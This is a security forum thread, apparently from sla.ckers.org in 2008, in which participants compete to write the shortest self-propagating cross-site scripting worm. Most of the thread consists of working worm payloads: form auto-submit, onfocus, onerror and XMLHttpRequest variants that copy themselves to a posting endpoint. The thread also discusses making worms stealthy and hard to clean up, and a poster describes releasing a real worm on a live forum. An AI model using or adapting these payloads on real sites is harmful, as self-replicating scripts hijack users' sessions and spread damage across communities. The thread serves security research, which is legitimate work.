My current submission, fitting in with doctype compliance and no user interaction:

<form name=r><input name="content"><script>with(document.r)submit(content.value='<form name=r>'+innerHTML,action=(method='post')+'.php',alert('XSS'))</script>

158 characters

-Dan

<form name=f><input name="content"><script>with(_=document.f)submit(_[0].value='<form name=f>'+innerHTML,action=(method='post')+'.php',alert('XSS'))</script>

157

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript



Edited 1 time(s). Last edit at 01/06/2008 03:08PM by ma1.

<body onfocus=with(document)[c=["%3"]+"E",body.innerHTML=unescape("<form\tmethod=post\taction=/post.php"+c+"<textarea\tname=content"+c+"<body\tonfocus="+(onfocus+c).replace(/[\s\x7B\x7D\x3B]|^[^\)]*\)/g,"")+"</body"+c),forms[0].submit(),alert("xss")]>

252 chars...not setting any records here. It *was* a lot smaller, but it just kept on getting bigger and bigger as I ironed out the bugs. At least it should work in in both standards and quirksmodes in both Firefox 2 and IE6 (under Wine anyway). And it makes it very difficult to logout of the tester ;-). In fact, I had to move the alert to the end (which adds a few chars) because otherwise it would just keep showing alerts, then refocusing the window, showing another alert as a result...

Just sharing because I like my <body onfocus> hack. Now, to start over with something more practical...

(also: can we get away with posting to "post.php"? I thought would have to be "/post.php" since it's on the root directory...)

<form><textarea name=content onMouseMove="eval(value)">alert('XSS');with(parentNode)action=(method='post')+'9.php',value='<form>'+innerHTML,submit()</textarea>

160 chars

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

<form><input name=content onMouseMove="eval(value)" value="alert('XSS');with(parentNode)action=(method='post')+'9.php',value='<form>'+innerHTML,submit()">

154 chars

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

@dbloom

I like your approach, in a vector I have here on my PC I also utilized the body onload to propagate, which seems one of the most logical and real world scenarios, but sadly hardly suitable to the rules that are set.

@Gareth:
not sure, wasn't user interation banned?
At any rate, why not directly

<form><input name="content" onmousemove="submit(action=(method='post')+'.php',value='<form>'+form.innerHTML.slice(alert('XSS'),128))">

(134)?

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

@ma1

Ah right sorry it's hard to follow

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

doctype compilant mode (156):

<form><input name=content><img onerror="with(_=parentNode)alert('XSS',submit(_[0].value='<form>'+innerHTML.slice(action=(method='post')+'.php',150)))"src=

I dont really understand how it works, but it appears to work..

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

ok, I dont really know if that last vector is valid.. since it successfully adapts itself to IE, and grows without more changes in IE.

and it adapts itself to FF and grows without more changes in FF.

this version is crossbrowser..

<form><input name=content><img onerror="with(_=parentNode)alert('XSS',submit(_[0].value='<form>'+innerHTML.slice(action=(method='post')+'.php',151)))"src=

but larger..

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

<script>alert('xss');with(new XMLHttpRequest){open("POST","post.php");setRequestHeader('content-type','multipart/form-data');send('content=<script>'+innerHTML+'<\/script>')};</script>

You guys seem to have a handle on the form method, here's the shortest XHR method I could write.


EDIT -
If you're wondering about the lack of an MS check loop...well, IE7 has a native XHR object...hehe.

- Kyran



Edited 1 time(s). Last edit at 01/06/2008 04:45PM by Kyran.

Hmm, I don't think that one above worked for me, unfortunately. I believe the issue is with what innerHTML is (or is not) referring to.
Good size for the XHR, though!

-Dan

EDIT
@ ma1,
nice little tweak to mine to gain that byte!



Edited 1 time(s). Last edit at 01/06/2008 05:11PM by DoctorDan.

Yes, it appears this.innerHTML or maybe an id on the script will be needed. My bad.

- Kyran

This one seems doctype compliant passed the judge when i tried last (IE/FF2)

<form><img onerror="with(i=parentNode)alert('XSS',submit(i[0].value='<form>'+innerHTML.slice(action=(method='post')+'.php',153)))" src="x"><input name="content"

159

<form name=m><input name="content"><script>with(document.m)submit(alert('XSS'),action=(method='post')+'.php',content.value='<form name=f>'+innerHTML)</script>

158


<edit>Just realized my 158 byte long one is almost the same like DoctorDan's which he posted before - damn!</edit>

Time for bed now - gotta get back to work tomorrow.
Gn8,
.mario



Edited 1 time(s). Last edit at 01/06/2008 05:42PM by .mario.

284 posts in three days? wow.

-tx @ lowtech-labs.org

Probably a sla.ckers record, I'd say. Very compelling read though. I know I learned a thing or two in the process. Still lots of time left though, I'll be curious to see what else people come up with in the coming days!

- RSnake
Gotta love it. http://ha.ckers.org

Ronald Wrote:
-------------------------------------------------------
> > RSnake; If someone has to type a novel into a
> form to get it to work, while technically that's a
> worm, it's not a particularly good one.
>
>
> lol, this will be a classic ^^

"This virus works on the honor system. Please forward this message to everyone you know, then delete all the files on your hard disk. Thank you for your cooperation."

165 bytes.. not bad eh? :)

Hahah - I bet we could shorten that one too. ;)

- RSnake
Gotta love it. http://ha.ckers.org

Quote
Kyran

<script>alert('xss');with(new XMLHttpRequest){open("POST","post.php");setRequestHeader('content-type','multipart/form-data');send('content=<script>'+innerHTML+'<\/script>')};</script>

What's wrong:
- innerHTML reference
- <\/script> will be translated to </script> when the worm propagate 1 time
- not encoding the content data
- multipart/form-data does this actually work? I tried to strip down the Content-Type with testing against IIS, but I failed ... it is just the question which Content-Type's Apache works with ...

Anyway, your with() inspired me to use ;-) (before I didn't set my Content-Type so it wasn't shorter with with, but now it saves 1 whole byte).
I did some research on the Content-Type too, see the W3C HTML 4.01 spec on Form content types (a page with more interesting specs about forms). If you use multipart/form-data you have to do much more, like boundary's, etc.

The really inspiring post came from dbloom:

Quote
dbloom

[c=["%3"]+"E",(...)unescape(c)

BTW he did some more nice hacks.
Now I can write my q=String.fromCharCode(34); as q=unescape('%'+22); which saves an astonishing 7 bytes :-).

Making this the shortest crossbrowser (FF2/IE7) XMLHttpRequest worm till now:

<script>eval(y="alert('XSS');q=unescape('%'+22);with(new XMLHttpRequest()){open('POST','post.php');setRequestHeader('Content-Type','application/x-www-form-urlencoded');send('content='+encodeURIComponent('<script>eval(y='+q+y+q+')</sc'+'ript>'))}")</script>

256 bytes - nice number

BTW some nice improvements of the interface sirdarckcat
@tx/rsnake: I registered just for this interesting 'contest' and also learned some new tricks

@rsnake: in a real worm situation, the post.php would probably echo the vector again right? In all the <form> worm cases they loop indefinitely, would that be beneficial for the worm? (I don't think so ...)

@bwb labs - that's actually the first really good reason I've heard for why you'd want to use XMLHttpRequest. The second reason would be that you wouldn't load all the images/css, etc... that comes with reloading the page.

Buuuut, I can definitely see situations where post.php didn't automatically show the content in question (this forum, for instance, often doesn't show the content you just submitted). So for the purposes of this contest, let's not worry about infinite loops since that's slightly speculative and ultimately doesn't hurt propagation - it just makes it terribly annoying to the user, but that's a great comment and I'll definitely mention it in my post at the end of the contest.

- RSnake
Gotta love it. http://ha.ckers.org

My entry (doesn't work with doctype, can someone explain why?):

<form><input id="c" name="content"><img onerror="with(c)with(parentNode)alert('xss',submit(value='<form>'+innerHTML,action=(method='post')+'.php'))" src="

154 bytes, it grows but the first 154 chars stay the same (so it could work with a limit of 154).

Yeah, tried to mention it earlier, but since this became a high volume topic you have to address things personally ;-).

Got another byte off (don't have to split the %22):

<script>eval(y="alert('XSS');q=unescape('%22');with(new XMLHttpRequest()){open('POST','post.php');setRequestHeader('content-Type','application/x-www-form-urlencoded');send('content='+encodeURIComponent('<script>eval(y='+q+y+q+')</sc'+'ript>'))}")</script>

255 bytes - XMLHttpRequest (my personal little contest ;-)
Would fit great in a varchar(255) now ;-)

Sadly caching the 'content' or 'script>' isn't beneficial ... (only adds bytes).

@bwb labs - I read that, but I wasn't sure what you meant until you explained it. Now I'm clear. I definitely agree that although XMLHttpRequest almost certainly won't win the actual contest, it's probably got the best hope of being turned into an actual worm based on that fact in the situation you described, without site specific code that may come into play (eg changing the landing page). I suppose you could set a cookie or something in another variant to ensure it doesn't re-load if the cookie is present.

- RSnake
Gotta love it. http://ha.ckers.org

Quote
[url=http://sla.ckers.org/forum/read.php?2,18790,18906#msg-18906
bwb labs[/url]]Good point! Because all implementations with <form> postings might loop on the form page, replicating itself indefinitely ...
That's why an XMLHttpRequest is nice, it only get's the page once and doesn't loop (other tricks/methods might work too).

Other methods I can think of depend on some kind of storage to check before propagation:
- Cookies (but they are send to the server) - permanent, logged in logfiles
- Window name (if no special name is required), can be done with form target - session, stealth
- Url (in query or # part) - onetimer, stealth (in # case)

In comparison with the simple XMLHttpRequest where you don't need additional logic:
- XMLHttpRequest - onetimer, stealth

@RSnake
The infinite loop absolutely does hurt propagation in a real world scenario. A worm should go undetected, as it will ultimately buy itself more time to propagate until it's counteracted. XHR is simply the way to go for an XSS worm. On a side note, the form method doesn't absolutely have to be continuous. A cookie, for example, could be set and checked for. For this contest, though, a continuous form must be the winner. Requiring a cross-browser, cross-HTTPserver, silent worm independent of user interaction would be very interesting, and it would provide many possible paths to follow.

-Dan

EDIT: oops, didn't notice you all already mentioned the cookie thing :P
I don't think checking URL would be ideal, as it just is not constant enough. Window name is interesting, but may be a little sticky. Cookie is fine, but XHR is just wonderful for this.



Edited 1 time(s). Last edit at 01/06/2008 09:14PM by DoctorDan.

@Dan - I can see that logic, except in reality most of the time the time it takes to fix a worm is not based on detection because even the XMLHttpRequest based worms were noisy and all of them were fixed within one day. It's generally based on the time necessary to build the code to fix it, or wipe the information from the databases or both. So I'd like to buy that but I don't think in reality it's substantially different.

- RSnake
Gotta love it. http://ha.ckers.org

Interesting! I do think you're right.
Assuming the goal of the worm is for itself to be copied as many times as possible, a few questions are posed:
Stealth is certainly needed for mass propagation, so how should a good worm be silent? How should web developers best detect worms, assuming they're relatively silent? Also, it should be hard to clean up, so how can one make a worm "messy" to fix? How can a web developer best resolve the issue of a messy worm?

I think these questions are important, but probably shouldn't be discussed in this thread, so I am going to start a new one: http://sla.ckers.org/forum/read.php?2,19143

-Dan

@rsnake:

I once wrote an xss worm on a forum based on a flaw in a javascript code (it called unescape on info from the user's signature). I had it add it's code as well as a bit of invisible text as a payload and it took several weeks before it was discovered. By that time every active member of the forum had the worm in their signature. The admin must have discovered what the source of the problem was because the code was removed (and the worm failed to work after that). I could publish the code if it's of interest.

@Spikeman - that's interesting, I hadn't heard of that. Yes, I'd love to see the code. Throw it in the worms section.

- RSnake
Gotta love it. http://ha.ckers.org

`



Edited 2 time(s). Last edit at 01/09/2008 12:12AM by 4909.